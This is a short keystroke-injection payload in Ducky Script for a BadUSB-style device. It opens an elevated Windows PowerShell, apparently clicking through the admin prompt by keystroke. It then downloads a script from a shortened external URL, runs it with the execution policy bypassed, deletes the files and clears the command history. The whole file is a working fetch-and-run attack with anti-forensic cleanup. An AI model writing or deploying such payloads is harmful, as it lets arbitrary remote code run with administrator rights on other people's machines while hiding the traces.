REM --------------OPEN POWERSHELL

DELAY 100
CTRL ESC
DELAY 400
STRING Windows PowerShell
DELAY 400
RIGHT
DOWN
ENTER
DELAY 400
LEFT
SHIFT SPACE
ENTER
DELAY 300
REM ----Creating work folder----

STRING mkdir $env:TEMP/script
DELAY 200
ENTER
DELAY 100
STRING  Invoke-WebRequest -Uri https://s.42l.fr/v3N13YCX -OutFile $env:TEMP/script/script.ps1
ENTER
DELAY 3000
STRING powershell.exe -ExecutionPolicy Bypass -File $env:TEMP/script/script.ps1
ENTER
DELAY 3000
STRING Remove-Item -Path $env:TEMP/script -Recurse -Force
DELAY 100
ENTER
DELAY 100
STRING Clear-History
DELAY 100
ENTER
DELAY 200
STRING exit
DELAY 100
ENTER
